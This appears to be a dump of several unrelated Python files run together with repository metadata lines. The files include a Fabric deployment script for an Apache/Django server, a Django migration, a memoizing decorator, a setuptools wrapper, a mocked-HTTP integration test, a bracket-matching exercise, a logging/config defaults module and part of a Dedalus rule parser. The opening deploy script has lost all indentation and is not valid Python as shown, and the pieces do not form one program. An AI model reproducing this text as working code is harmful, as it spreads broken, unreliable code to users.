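# Usage (sketch, Fabric 1.x CLI): with deploy.json filled in, run
#   fab new_server   # first-time provisioning + deploy
#   fab deploy       # subsequent deploys
# Hosts and credentials come from the env.* values defined above.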
def setup():
_get_latest_apt()
_install_apt_requirements(apt_requirements)
_make_virtualenv()
#_ufw_allow()
def deploy():
_get_latest_source()
_put_envs()
_update_settings()
_update_virtualenv()
_update_static_files()
_update_database()
#_ufw_allow()
_make_virtualhost()
_grant_apache2()
_grant_sqlite3()
_restart_apache2()
def _put_envs():
put(os.path.join(PROJECT_DIR, 'envs.json'), '~/{}/envs.json'.format(PROJECT_NAME))
def _get_latest_apt():
update_or_not = input('would you update?: [y/n]')
if update_or_not=='y':
sudo('sudo apt-get update && sudo apt-get -y upgrade')
def _install_apt_requirements(apt_requirements):
reqs = ''
for req in apt_requirements:
reqs += (' ' + req)
sudo('sudo apt-get -y install {}'.format(reqs))
def _make_virtualenv():
if not exists('~/.virtualenvs'):
script = '''"# python virtualenv settings
export WORKON_HOME=~/.virtualenvs
export VIRTUALENVWRAPPER_PYTHON="$(command \which python3)" # location of python3
source /usr/local/bin/virtualenvwrapper.sh"'''
run('mkdir ~/.virtualenvs')
sudo('sudo pip3 install virtualenv virtualenvwrapper')
run('echo {} >> ~/.bashrc'.format(script))
def _get_latest_source():
if exists(project_folder + '/.git'):
run('cd %s && git fetch' % (project_folder,))
else:
run('git clone %s %s' % (REPO_URL, project_folder))
current_commit = local("git log -n 1 --format=%H", capture=True)
run('cd %s && git reset --hard %s' % (project_folder, current_commit))
def _update_settings():
settings_path = project_folder + '/{}/settings.py'.format(PROJECT_NAME)
sed(settings_path, "DEBUG = True", "DEBUG = False")
sed(settings_path,
'ALLOWED_HOSTS = .+$',
'ALLOWED_HOSTS = ["%s"]' % (REMOTE_HOST,)
)
secret_key_file = project_folder + '/{}/secret_key.py'.format(PROJECT_NAME)
if not exists(secret_key_file):
chars = 'abcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*(-_=+)'
key = ''.join(random.SystemRandom().choice(chars) for _ in range(50))
append(secret_key_file, "SECRET_KEY = '%s'" % (key,))
append(settings_path, '\nfrom .secret_key import SECRET_KEY')
def _update_virtualenv():
virtualenv_folder = project_folder + '/../.virtualenvs/{}'.format(PROJECT_NAME)
if not exists(virtualenv_folder + '/bin/pip'):
run('cd /home/%s/.virtualenvs && virtualenv %s' % (env.user, PROJECT_NAME))
run('%s/bin/pip install -r %s/requirements.txt' % (
virtualenv_folder, project_folder
))
def _update_static_files():
virtualenv_folder = project_folder + '/../.virtualenvs/{}'.format(PROJECT_NAME)
run('cd %s && %s/bin/python3 manage.py collectstatic --noinput' % (
project_folder, virtualenv_folder
))
def _update_database():
virtualenv_folder = project_folder + '/../.virtualenvs/{}'.format(PROJECT_NAME)
run('cd %s && %s/bin/python3 manage.py migrate --noinput' % (
project_folder, virtualenv_folder
))
def _ufw_allow():
sudo("ufw allow 'Apache Full'")
sudo("ufw reload")
def _make_virtualhost():
script = """'<VirtualHost *:80>
ServerName {servername}
Alias /{static_url} /home/{username}/{project_name}/{static_root}
Alias /{media_url} /home/{username}/{project_name}/{media_url}
<Directory /home/{username}/{project_name}/{media_url}>
Require all granted
</Directory>
<Directory /home/{username}/{project_name}/{static_root}>
Require all granted
</Directory>
<Directory /home/{username}/{project_name}/{project_name}>
<Files wsgi.py>
Require all granted
</Files>
</Directory>
WSGIDaemonProcess {project_name} python-home=/home/{username}/.virtualenvs/{project_name} python-path=/home/{username}/{project_name}
WSGIProcessGroup {project_name}
WSGIScriptAlias / /home/{username}/{project_name}/{project_name}/wsgi.py
ErrorLog ${{APACHE_LOG_DIR}}/error.log
CustomLog ${{APACHE_LOG_DIR}}/access.log combined
</VirtualHost>'""".format(
static_root=STATIC_ROOT_NAME,
username=env.user,
project_name=PROJECT_NAME,
static_url=STATIC_URL_NAME,
servername=REMOTE_HOST,
media_url=MEDIA_ROOT
)
sudo('echo {} > /etc/apache2/sites-available/{}.conf'.format(script, PROJECT_NAME))
sudo('a2ensite {}.conf'.format(PROJECT_NAME))
def _grant_apache2():
sudo('sudo chown -R :www-data ~/{}'.format(PROJECT_NAME))
def _grant_sqlite3():
sudo('sudo chmod 775 ~/{}/db.sqlite3'.format(PROJECT_NAME))
def _restart_apache2():
sudo('sudo service apache2 restart') | [
"[email protected]"
] | |
5edb0c8e55ee71407031f5baea3676bd34bf5368 | 28ae42f6a83fd7c56b2bf51e59250a31e68917ca | /tracpro/polls/migrations/0015_issue_region.py | ff1c2937af89c2c8ce646673002fd58356fd1f04 | [
"BSD-3-Clause"
] | permissive | rapidpro/tracpro | 0c68443d208cb60cbb3b2077977786f7e81ce742 | a68a782a7ff9bb0ccee85368132d8847c280fea3 | refs/heads/develop | 2021-01-19T10:29:48.381533 | 2018-03-13T12:17:11 | 2018-03-13T12:17:11 | 29,589,268 | 5 | 10 | BSD-3-Clause | 2018-02-23T14:43:12 | 2015-01-21T12:51:24 | Python | UTF-8 | Python | false | false | 575 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('groups', '0004_auto_20150123_0909'),
('polls', '0014_remove_response_is_complete'),
]
operations = [
migrations.AddField(
model_name='issue',
name='region',
field=models.ForeignKey(related_name='issues_2', to='groups.Region', help_text='Region where poll was conducted', null=True),
preserve_default=True,
),
]
| [
"[email protected]"
] | |
6b10d9a5295db113b96722c8b92c968c83079333 | ef821468b081ef2a0b81bf08596a2c81e1c1ef1a | /Python OOP/Decorators-Exercise/Cache.py | 3630fbd6868ddb28d50316c5fea622d51b440ae5 | [] | no_license | Ivaylo-Atanasov93/The-Learning-Process | 71db22cd79f6d961b9852f140f4285ef7820dd80 | 354844e2c686335345f6a54b3af86b78541ed3f3 | refs/heads/master | 2023-03-30T20:59:34.304207 | 2021-03-29T15:23:05 | 2021-03-29T15:23:05 | 294,181,544 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 346 | py | def cache(func):
def wrapper(n):
result = func(n)
wrapper.log[n] = result
return result
wrapper.log = {}
return wrapper
@cache
def fibonacci(n):
if n < 2:
return n
else:
return fibonacci(n - 1) + fibonacci(n - 2)
fibonacci(3)
print(fibonacci.log)
fibonacci(4)
print(fibonacci.log)
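# Note (sketch): the standard library offers similar memoization via
# functools.lru_cache, e.g.
#   from functools import lru_cache
#   @lru_cache(maxsize=None)
#   def fib(n): ...
# though it does not expose a per-argument log like `cache` above.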
| [
"[email protected]"
] | |
b8fac3e471ae450389961aa1cb49b4834ce1d6cb | 5b565e331073a8b29f997c30b58d383806f7d5a8 | /pizzeria/11_env/bin/easy_install-3.7 | 242566d7d779997c369a8ea2a01c7db939a5250b | [] | no_license | jeongwook/python_work | f403d5be9da6744e49dd7aedeb666a64047b248d | bba188f47e464060d5c3cd1f245d367da37827ec | refs/heads/master | 2022-04-02T23:16:57.597664 | 2020-01-21T08:29:48 | 2020-01-21T08:29:48 | 227,506,961 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 288 | 7 | #!/Users/jeongwook/Desktop/python/python_work/pizzeria/11_env/bin/python3
# -*- coding: utf-8 -*-
import re
import sys
from setuptools.command.easy_install import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"[email protected]"
] | |
7d75a5e69d0aeff702d6fe53686e32f47cd01b4e | f1614f3531701a29a33d90c31ab9dd6211c60c6b | /test/menu_sun_integration/handlers/test_status_synchronizer_service.py | 207c451856241312424ce76fdbb72a3f98062b7d | [] | no_license | pfpacheco/menu-sun-api | 8a1e11543b65db91d606b2f3098847e3cc5f2092 | 9bf2885f219b8f75d39e26fd61bebcaddcd2528b | refs/heads/master | 2022-12-29T13:59:11.644409 | 2020-10-16T03:41:54 | 2020-10-16T03:41:54 | 304,511,679 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,110 | py | import json
import os
import responses
import pytest
from menu_sun_api.domain.model.customer.customer import Customer
from menu_sun_api.domain.model.order.order import OrderStatusType
from menu_sun_api.domain.model.order.order_repository import OrderRepository
from menu_sun_api.domain.model.seller.seller import IntegrationType
from menu_sun_integration.application.services.order_integration_service import OrderIntegrationService
from promax.application.status_synchronizer_service import StatusSynchronizerService
from test.menu_sun_api.db.order_factory import OrderFactory, OrderStatusFactory
from test.menu_sun_api.db.seller_factory import SellerFactory
from test.menu_sun_api.integration_test import IntegrationTest
here = os.path.dirname(os.path.realpath(__file__))
def bind_seller(integration_type):
return SellerFactory.create(seller_code='0810204', integration_type=integration_type)
class TestStatusNotifierService(IntegrationTest):
@pytest.fixture
def active_responses(self):
json_file = open(
os.path.join(
here,
'../../menu_sun_integration/infrastructure/ambev/promax_response/authenticate_user_response.json'))
response = json.load(json_file)
responses.add(responses.POST, 'https://{}/ambev/security/ldap/authenticateUser'.format(os.getenv("PROMAX_IP")),
json=response, status=200)
return responses
@responses.activate
def test_fetch_order_status_promax(self, session, active_responses):
seller = bind_seller(IntegrationType.PROMAX)
session.commit()
customer = Customer(document="17252508000180", seller_id=seller.id)
statuses = [OrderStatusFactory(status=OrderStatusType.NEW),
OrderStatusFactory(status=OrderStatusType.APPROVED)]
order = OrderFactory.create(seller_id=seller.id, order_id='M2100008658',
customer=customer, statuses=statuses)
session.commit()
json_file = open(
os.path.join(
here,
'../../menu_sun_integration/infrastructure/ambev/promax_response/orders_history_response.json'))
response = json.load(json_file)
active_responses.add(responses.POST,
'https://{}/ambev/genericRestEndpoint'.format(os.getenv("PROMAX_IP")),
json=response, status=200)
order_repository = OrderRepository(session=session)
integration_service = OrderIntegrationService(session=session)
status_notification = StatusSynchronizerService(order_repository=order_repository,
integration_service=integration_service)
status_notification.sync_all_pending_orders(
seller_id=seller.id, seller_code=seller.seller_code, integration_type=seller.integration_type)
session.commit()
order = order_repository.get_order(
seller_id=seller.id, order_id=order.order_id)
assert (order.status.status == OrderStatusType.CANCELED)
| [
"[email protected]"
] | |
faf55dcced2172399d37e25d66e39d89868333d0 | 280049c5d363df840e5a2184002e59625f0af61b | /datastructure11-balancedparanthesischeck.py | 26c752c9dfffff64c23a2cf8d5095ae37812d617 | [] | no_license | deesaw/DataSPython | 853c1b36f7185752613d6038e706b06fbf25c84e | c69a23dff3b3852310f145d1051f2ad1dda6b7b5 | refs/heads/main | 2023-02-19T13:36:01.547293 | 2021-01-16T13:15:56 | 2021-01-16T13:15:56 | 330,166,053 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,346 | py | # -*- coding: utf-8 -*-
"""
Created on Wed Jan 6 12:17:58 2021
@author: deesaw
"""
def balance_check(s):
# Check is even number of brackets
if len(s)%2 != 0:
return False
# Set of opening brackets
opening = set('([{')
# Matching Pairs
matches = set([ ('(',')'), ('[',']'), ('{','}') ])
# Use a list as a "Stack"
stack = []
# Check every parenthesis in string
for paren in s:
# If its an opening, append it to list
if paren in opening:
stack.append(paren)
else:
# Check that there are parentheses in Stack
if len(stack) == 0:
return False
# Check the last open parenthesis
last_open = stack.pop()
# Check if it has a closing match
if (last_open,paren) not in matches:
return False
return len(stack) == 0
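# Each character is pushed and popped at most once, so balance_check runs in
# O(n) time and O(n) space for an input of length n.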
from nose.tools import assert_equal
class TestBalanceCheck(object):
def test(self,sol):
assert_equal(sol('[](){([[[]]])}('),False)
assert_equal(sol('[{{{(())}}}]((()))'),True)
assert_equal(sol('[[[]])]'),False)
print('ALL TEST CASES PASSED')
# Run Tests
t = TestBalanceCheck()
t.test(balance_check) | [
"[email protected]"
] | |
adec15e7f10d62c6d1a6c1bca83ce174883b2551 | 69f47a6e77fc2a1363fc8713ed83d36209e7cf32 | /deframed/default.py | 997b289bd34920ff3704dc3d241fa7fbc6f6c50e | [] | no_license | smurfix/deframed | f1c4611c597809b53a138b70665430ed080a989d | 9c1d4db2991cef55725ac6ecae44af60a96ff4f2 | refs/heads/master | 2022-07-20T14:08:35.938667 | 2022-07-14T07:05:43 | 2022-07-14T07:05:43 | 259,882,446 | 24 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,184 | py | """
This module contains the default values for configuring DeFramed.
"""
from .util import attrdict
__all__ = ["CFG"]
CFG = attrdict(
logging=attrdict( # a magic incantation
version=1,
loggers=attrdict(
#"asyncari": {"level":"INFO"},
),
root=attrdict(
handlers= ["stderr",],
level="INFO",
),
handlers=attrdict(
logfile={
"class":"logging.FileHandler",
"filename":"/var/log/deframed.log",
"level":"INFO",
"formatter":"std",
},
stderr={
"class":"logging.StreamHandler",
"level":"INFO",
"formatter":"std",
"stream":"ext://sys.stderr",
},
),
formatters=attrdict(
std={
"class":"deframed.util.TimeOnlyFormatter",
"format":'%(asctime)s %(levelname)s:%(name)s:%(message)s',
},
),
disable_existing_loggers=False,
),
server=attrdict( # used to setup the hypercorn toy server
host="127.0.0.1",
port=8080,
prio=0,
name="test me",
use_reloader=False,
ca_certs=None,
certfile=None,
keyfile=None,
),
mainpage="templates/layout.mustache",
debug=False,
data=attrdict( # passed to main template
title="Test page. Do not test!",
loc=attrdict(
#msgpack="https://github.com/ygoe/msgpack.js/raw/master/msgpack.min.js",
#mustache="https://github.com/janl/mustache.js/raw/master/mustache.min.js",
msgpack="https://unpkg.com/@msgpack/msgpack",
mustache="/static/ext/mustache.min.js",
bootstrap_css="https://stackpath.bootstrapcdn.com/bootstrap/4.4.1/css/bootstrap.min.css",
bootstrap_js="https://stackpath.bootstrapcdn.com/bootstrap/4.4.1/js/bootstrap.min.js",
poppler="https://cdn.jsdelivr.net/npm/[email protected]/dist/umd/popper.min.js",
jquery="https://code.jquery.com/jquery-3.4.1.slim.min.js",
),
static="static", # path
),
)
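# Minimal usage sketch (assumes attrdict from deframed.util exposes keys as
# attributes, which the keyword-argument construction above implies):
# from deframed.default import CFG
# host, port = CFG.server.host, CFG.server.port   # "127.0.0.1", 8080
# CFG.logging.root.level = "DEBUG"                # tweak before wiring up logging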
| [
"[email protected]"
] | |
e2165c7579217230237b68c6b491e3e20486e06b | c4ea97ae471cd222378684b8dc6be1047836dc85 | /src/dedt/dedalusParser.py | 9ba5de3d8b1778559ec87925a329aaff254cb7aa | [
"MIT"
] | permissive | KDahlgren/iapyx | b3de26da34ffd7dcc255afd9b70fe58de543711b | 260a265f79cd66bf4ea72b0a4837517d460dc257 | refs/heads/master | 2018-10-01T06:45:15.986558 | 2018-06-22T01:38:22 | 2018-06-22T01:38:22 | 109,737,208 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 26,697 | py | #!/usr/bin/env python
'''
dedalusParser.py
Define the functionality for parsing Dedalus files.
'''
import inspect, logging, os, re, string, sys, traceback
from pyparsing import *
import ConfigParser
# ------------------------------------------------------ #
# import sibling packages HERE!!!
if not os.path.abspath( __file__ + "/../.." ) in sys.path :
sys.path.append( os.path.abspath( __file__ + "/../.." ) )
from utils import tools
# ------------------------------------------------------ #
#############
# GLOBALS #
#############
eqnOps = [ "==", "!=", ">=", "<=", ">", "<" ]
opList = eqnOps + [ "+", "-", "/", "*" ]
aggOps = [ "min", "max", "sum", "count", "avg" ]
##################
# CLEAN RESULT #
##################
# input pyparse object of the form ([...], {...})
# output only [...]
def cleanResult( result ) :
newResult = []
numParsedStrings = len(result)
for i in range(0, numParsedStrings) :
newResult.append( result[i] )
return newResult
###########
# PARSE #
###########
# input a ded line
# output parsed line
# fact returns : [ 'fact', { relationName:'relationNameStr', dataList:[ data1, ... , dataN ], factTimeArg:<anInteger> } ]
# rule returns : [ 'rule',
# { relationName : 'relationNameStr',
# goalAttList:[ data1, ... , dataN ],
# goalTimeArg : ""/next/async,
# subgoalListOfDicts : [ { subgoalName : 'subgoalNameStr',
# subgoalAttList : [ data1, ... , dataN ],
# polarity : 'notin' OR '',
# subgoalTimeArg : <anInteger> }, ... ],
# eqnDict : { 'eqn1':{ variableList : [ 'var1', ... , 'varI' ] },
# ... ,
# 'eqnM':{ variableList : [ 'var1', ... , 'varJ' ] } } } ]
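# Illustrative example (assumed Dedalus syntax, matching the grammar handled below):
# parse( 'log(X)@next:-log(X);', settings_path )
# ~> [ 'rule', { 'relationName' : 'log',
# 'goalAttList' : ['X'],
# 'goalTimeArg' : 'next',
# 'subgoalListOfDicts' : [ { 'subgoalName' : 'log', 'subgoalAttList' : ['X'], ... } ],
# 'eqnDict' : {} } ]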
def parse( dedLine, settings_path ) :
logging.debug( " PARSE : dedLine = '" + dedLine + "'" )
# ---------------------------------------------------- #
# CASE : line is empty
if dedLine == "" :
return None
# ---------------------------------------------------- #
# CASE : line missing semicolon
elif not ";" in dedLine :
sys.exit( " PARSE : ERROR : missing semicolon in line '" + dedLine + "'" )
# ---------------------------------------------------- #
# CASE : line is an include
elif dedLine.startswith( 'include"' ) or dedLine.startswith( "include'" ) :
pass
# ---------------------------------------------------- #
# CASE : line is a FACT
elif not ":-" in dedLine :
if not sanityCheckSyntax_fact_preChecks( dedLine ) :
sys.exit( " PARSE : ERROR : invalid syntax in fact '" + dedLine + "'" )
factData = {}
# ///////////////////////////////// #
# get relation name
relationName = dedLine.split( "(", 1 )[0]
# ///////////////////////////////// #
# get data list
dataList = dedLine.split( "(", 1 )[1] # string
dataList = dataList.split( ")", 1 )[0] # string
dataList = dataList.split( "," )
# ///////////////////////////////// #
# get time arg
ampersandIndex = dedLine.index( "@" )
factTimeArg = dedLine[ ampersandIndex + 1 : ]
factTimeArg = factTimeArg.replace( ";", "" ) # remove semicolons
# ///////////////////////////////// #
# save fact information
factData[ "relationName" ] = relationName
factData[ "dataList" ] = dataList
factData[ "factTimeArg" ] = factTimeArg
if not sanityCheckSyntax_fact_postChecks( dedLine, factData ) :
sys.exit( " PARSE : ERROR : invalid syntax in fact '" + dedLine + "'" )
logging.debug( " PARSE : returning " + str( [ "fact", factData ] ) )
return [ "fact", factData ]
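# Illustrative example (assumed fact syntax):
# parse( 'node("a","b")@1;', settings_path )
# ~> [ 'fact', { 'relationName' : 'node',
# 'dataList' : [ '"a"', '"b"' ],
# 'factTimeArg' : '1' } ]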
# ---------------------------------------------------- #
# CASE : line is a RULE
#
# rule returns : [ 'rule',
# { relationName : 'relationNameStr',
# goalAttList:[ data1, ... , dataN ],
# goalTimeArg : ""/next/async,
# subgoalListOfDicts : [ { subgoalName : 'subgoalNameStr',
# subgoalAttList : [ data1, ... , dataN ],
# polarity : 'notin' OR '',
# subgoalTimeArg : <anInteger> }, ... ],
# eqnDict : { 'eqn1':{ variableList : [ 'var1', ... , 'varI' ] },
# ... ,
# 'eqnM':{ variableList : [ 'var1', ... , 'varJ' ] } } } ]
elif ":-" in dedLine :
if not sanityCheckSyntax_rule_preChecks( dedLine ) :
sys.exit( " PARSE : ERROR : invalid syntax in fact '" + dedLine + "'" )
ruleData = {}
# ///////////////////////////////// #
# get relation name
relationName = dedLine.split( "(", 1 )[0]
ruleData[ "relationName" ] = relationName
# ///////////////////////////////// #
# get goal attribute list
goalAttList = dedLine.split( "(", 1 )[1] # string
goalAttList = goalAttList.split( ")", 1 )[0] # string
goalAttList = goalAttList.split( "," )
ruleData[ "goalAttList" ] = goalAttList
# ///////////////////////////////// #
# get goal time argument
goalTimeArg = dedLine.split( ":-", 1 )[0] # string
try :
goalTimeArg = goalTimeArg.split( "@", 1 )[1] # string
except IndexError :
goalTimeArg = ""
ruleData[ "goalTimeArg" ] = goalTimeArg
# ///////////////////////////////// #
# parse the rule body for the eqn list
eqnDict = getEqnDict( dedLine )
ruleData[ "eqnDict" ] = eqnDict
# ///////////////////////////////// #
# parse the rule body for the eqn list
subgoalListOfDicts = getSubgoalList( dedLine, eqnDict )
ruleData[ "subgoalListOfDicts" ] = subgoalListOfDicts
logging.debug( " PARSE : relationName = " + str( relationName ) )
logging.debug( " PARSE : goalAttList = " + str( goalAttList ) )
logging.debug( " PARSE : goalTimeArg = " + str( goalTimeArg ) )
logging.debug( " PARSE : subgoalListOfDicts = " + str( subgoalListOfDicts ) )
logging.debug( " PARSE : eqnDict = " + str( eqnDict ) )
if not sanityCheckSyntax_rule_postChecks( dedLine, ruleData, settings_path ) :
sys.exit( " PARSE : ERROR : invalid syntax in fact '" + dedLine + "'" )
logging.debug( " PARSE : returning " + str( [ "rule", ruleData ] ) )
return [ "rule", ruleData ]
# ---------------------------------------------------- #
# CASE : wtf???
else :
sys.exit( " PARSE : ERROR : this line is not an empty, a fact, or a rule : '" + dedLine + "'. aborting..." )
##########################
# CONTAINS NO SUBGOALS #
##########################
# make cursory checks to determine if the input rule line contains subgoals
def containsNoSubgoals( dedLine ) :
body = getBody( dedLine )
# ------------------------------------- #
# CASE : an open parenthesis demarks
# the start of an attribute list,
# so a subgoal is likely present
if "(" in body :
return False
# ------------------------------------- #
# CASE : a closed parenthesis demarks
# the end of an attribute list,
# so a subgoal is likely present
elif ")" in body :
return False
# ------------------------------------- #
# CASE : commas delimit subgoals,
# so subgoals are likely present
elif "," in body :
return False
# ------------------------------------- #
# otherwise, no subgoals detected
else :
return True
#############
# HAS AGG #
#############
# check if the input attribute contains one
# of the supported aggregate operations.
def hasAgg( attStr ) :
flag = False
for agg in aggOps :
if agg+"<" in attStr :
flag = True
return flag
##################
# IS FIXED STR #
##################
# check if the input attribute is a string,
# as indicated by single or double quotes
def isFixedStr( att ) :
if att.startswith( "'" ) and att.endswith( "'" ) :
return True
elif att.startswith( '"' ) and att.endswith( '"' ) :
return True
else :
return False
##################
# IS FIXED INT #
##################
# check if input attribute is an integer
def isFixedInt( att ) :
if att.isdigit() :
return True
else :
return False
###########################################
# CHECK MIN ONE POS SUBGOAL NO TIME ARG #
###########################################
# make sure at least one positive subgoal
# has no numeric time argument
def check_min_one_pos_subgoal_no_time_arg( ruleLine, ruleData ) :
if not hasPosSubgoalWithoutIntegerTimeArg( ruleData ) :
raise Exception( " SANITY CHECK SYNTAX RULE POST CHECKS : ERROR : " + \
" invalid syntax in line \n'" + ruleLine + \
"'\n at least one positive subgoal " + \
"must not be annotated with a numeric time argument." )
################################
# CHECK IDENTICAL FIRST ATTS #
################################
# make sure all subgoals
# have identical first attributes
def check_identical_first_atts( ruleLine, ruleData ) :
subgoalListOfDicts = ruleData[ "subgoalListOfDicts" ]
firstAtts = []
for sub in subgoalListOfDicts :
subgoalAttList = sub[ "subgoalAttList" ]
firstAtts.append( subgoalAttList[0] )
firstAtts = set( firstAtts )
if not len( firstAtts ) < 2 :
raise Exception( " SANITY CHECK SYNTAX RULE : ERROR : " + \
"invalid syntax in line \n'" + ruleLine + \
"'\n all subgoals in next and async " + \
"rules must have identical first attributes.\n" )
##########################################
# SANITY CHECK SYNTAX RULE POST CHECKS #
##########################################
# make sure contents of rule make sense.
def sanityCheckSyntax_rule_postChecks( ruleLine, ruleData, settings_path ) :
# ------------------------------------------ #
# make sure all subgoals in next and async
# rules have identical first attributes
try :
use_hacks = tools.getConfig( settings_path, "DEFAULT", "USE_HACKS", bool )
if use_hacks :
if ruleData[ "goalTimeArg" ] == "next" :
check_identical_first_atts( ruleLine, ruleData )
else :
check_min_one_pos_subgoal_no_time_arg( ruleLine, ruleData )
if ruleData[ "goalTimeArg" ] == "next" or ruleData[ "goalTimeArg" ] == "async" :
check_identical_first_atts( ruleLine, ruleData )
except ConfigParser.NoOptionError :
logging.warning( "WARNING : no 'USE_HACKS' defined in 'DEFAULT' section of settings.ini ...running without wildcard rewrites." )
check_min_one_pos_subgoal_no_time_arg( ruleLine, ruleData )
if ruleData[ "goalTimeArg" ] == "next" or ruleData[ "goalTimeArg" ] == "async" :
check_identical_first_atts( ruleLine, ruleData )
# ------------------------------------------ #
# make sure all goal and subgoal attribute
# variables start with a captial letter
goalAttList = ruleData[ "goalAttList" ]
for att in goalAttList :
if not att[0].isalpha() or not att[0].isupper() :
if not hasAgg( att ) : # att is not an aggregate call
if not isFixedStr( att ) : # att is not a fixed data input
if not isFixedInt( att ) : # att is not a fixed data input
sys.exit( " SANITY CHECK SYNTAX RULE : ERROR : invalid syntax in line '" + ruleLine + "'\n the goal contains contains an attribute not starting with a capitalized letter: '" + att + "'. \n attribute variables must start with an upper case letter." )
subgoalListOfDicts = ruleData[ "subgoalListOfDicts" ]
for sub in subgoalListOfDicts :
subgoalAttList = sub[ "subgoalAttList" ]
for att in subgoalAttList :
if not att[0].isalpha() or not att[0].isupper() :
if not hasAgg( att ) : # att is not an aggregate call
if not isFixedStr( att ) : # att is not a fixed data input
if not isFixedInt( att ) : # att is not a fixed data input
# subgoals can have wildcards
if not att[0] == "_" :
sys.exit( " SANITY CHECK SYNTAX RULE : ERROR : invalid syntax in line '" + ruleLine + "'\n subgoal '" + sub[ "subgoalName" ] + "' contains an attribute not starting with a capitalized letter: '" + att + "'. \n attribute variables must start with an upper case letter." )
# ------------------------------------------ #
# make sure all relation names are
# lower case
goalName = ruleData[ "relationName" ]
for c in goalName :
if c.isalpha() and not c.islower() :
sys.exit( " SANITY CHECK SYNTAX RULE : ERROR : invalid syntax in line '" + ruleLine + "'\n The goal name '" + goalName + "' contains an upper-case letter. \n relation names must contain only lower-case characters." )
subgoalListOfDicts = ruleData[ "subgoalListOfDicts" ]
for sub in subgoalListOfDicts :
subName = sub[ "subgoalName" ]
for c in subName :
if c.isalpha() and not c.islower() :
sys.exit( " SANITY CHECK SYNTAX RULE : ERROR : invalid syntax in line '" + ruleLine + "'\n The subgoal name '" + subName + "' contains an upper-case letter. \n relation names must contain only lower-case characters." )
return True
##############################################
# HAS POS SUBGOAL WITHOUT INTEGER TIME ARG #
##############################################
# check make sure the line contains at least
# one positive subgoal NOT annotated with an
# integer time argument
def hasPosSubgoalWithoutIntegerTimeArg( ruleData ) :
goalTimeArg = ruleData[ "goalTimeArg" ]
subgoalListOfDicts = ruleData[ "subgoalListOfDicts" ]
# ------------------------------------------ #
# CASE : rule is either next or async
# the clock goal is always initially positive
if not goalTimeArg == "" :
return True
# ------------------------------------------ #
# CASE : rule is deductive
# need to check more closely for deductive rules
else :
for subgoal in subgoalListOfDicts :
if subgoal[ "polarity"] == "" : # positive
if not subgoal[ "subgoalTimeArg" ].isdigit() :
return True
return False
#########################################
# SANITY CHECK SYNTAX RULE PRE CHECKS #
#########################################
# make an initial pass on the rule syntax
def sanityCheckSyntax_rule_preChecks( ruleLine ) :
# make sure the line likely has subgoal(s)
if containsNoSubgoals( ruleLine ) :
sys.exit( " SANITY CHECK SYNTAX RULE : ERROR : invalid syntax in line '" + ruleLine + "'\n rule contains no detected subgoals." )
# make sure parentheses make sense
if not ruleLine.count( "(" ) == ruleLine.count( ")" ) :
sys.exit( " SANITY CHECK SYNTAX RULE : ERROR : invalid syntax in line '" + ruleLine + "'\n rule contains inconsistent counts for '(' and ')'" )
# make sure the number of single quotes is even
if not ruleLine.count( "'" ) % 2 == 0 :
sys.exit( " SANITY CHECK SYNTAX RULE : ERROR : invalid syntax in line '" + ruleLine + "'\n rule contains inconsistent use of single quotes." )
# make sure number of double quotes is even
if not ruleLine.count( '"' ) % 2 == 0 :
sys.exit( " SANITY CHECK SYNTAX RULE : ERROR : invalid syntax in line '" + ruleLine + "'\n rule contains inconsistent use of double quotes." )
return True
##################
# GET EQN DICT #
##################
# get the complete dictionary of equations in the given rule line
def getEqnDict( dedLine ) :
eqnDict = {}
body = getBody( dedLine )
body = body.split( "," )
# get the complete list of eqns from the rule body
eqnList = []
for thing in body :
if isEqn( thing ) :
eqnList.append( thing )
# get the complete list of variables per eqn
for eqn in eqnList :
varList = getEqnVarList( eqn )
eqnDict[ eqn ] = varList
return eqnDict
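# Example (illustrative):
# getEqnDict( 'p(X,Y):-q(X,Y),X==Y+1;' ) -> { 'X==Y+1' : ['X','Y','1'] }
# note the naive comma split above relies on equations not containing commas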
######################
# GET EQN VAR LIST #
######################
def getEqnVarList( eqnString ) :
for op in opList :
eqnString = eqnString.replace( op, "___COMMA___" )
varList = eqnString.split( "___COMMA___" )
return varList
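# Example (illustrative): getEqnVarList( "X==Y+1" ) first yields
# "X___COMMA___Y___COMMA___1" and then returns ['X', 'Y', '1']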
######################
# GET SUBGOAL LIST #
######################
# get the complete list of subgoals in the given rule line
# subgoalListOfDicts : [ { subgoalName : 'subgoalNameStr',
# subgoalAttList : [ data1, ... , dataN ],
# polarity : 'notin' OR '',
# subgoalTimeArg : <anInteger> }, ... ]
def getSubgoalList( dedLine, eqnList ) :
subgoalListOfDicts = []
# ========================================= #
# replace eqn instances in line
for eqn in eqnList :
dedLine = dedLine.replace( eqn, "" )
dedLine = dedLine.replace( ",,", "," )
# ========================================= #
# grab subgoals
# grab indexes of commas separating subgoals
indexList = getCommaIndexes( getBody( dedLine ) )
#print indexList
# replace all subgoal-separating commas with a special character sequence
body = getBody( dedLine )
tmp_body = ""
for i in range( 0, len( body ) ) :
if not i in indexList :
tmp_body += body[i]
else :
tmp_body += "___SPLIT___HERE___"
body = tmp_body
#print body
# generate list of separated subgoals by splitting on the special
# character sequence
subgoals = body.split( "___SPLIT___HERE___" )
# remove empties
tmp_subgoals = []
for sub in subgoals :
if not sub == "" :
tmp_subgoals.append( sub )
subgoals = tmp_subgoals
# ========================================= #
# parse all subgoals in the list
for sub in subgoals :
#print sub
currSubData = {}
if not sub == "" :
# get subgoalTimeArg
try :
ampersandIndex = sub.index( "@" )
subgoalTimeArg = sub[ ampersandIndex + 1 : ]
sub = sub.replace( "@" + subgoalTimeArg, "" ) # remove the time arg from the subgoal
except ValueError :
subgoalTimeArg = ""
# get subgoal name and polarity
data = sub.replace( ")", "" )
data = data.split( "(" )
subgoalName = data[0]
subgoalName = subgoalName.replace( ",", "" ) # remove any rogue commas
if " notin " in subgoalName :
polarity = "notin"
subgoalName = subgoalName.replace( " notin ", "" )
else :
polarity = ""
# get subgoal att list
subgoalAttList = data[1]
subgoalAttList = subgoalAttList.split( "," )
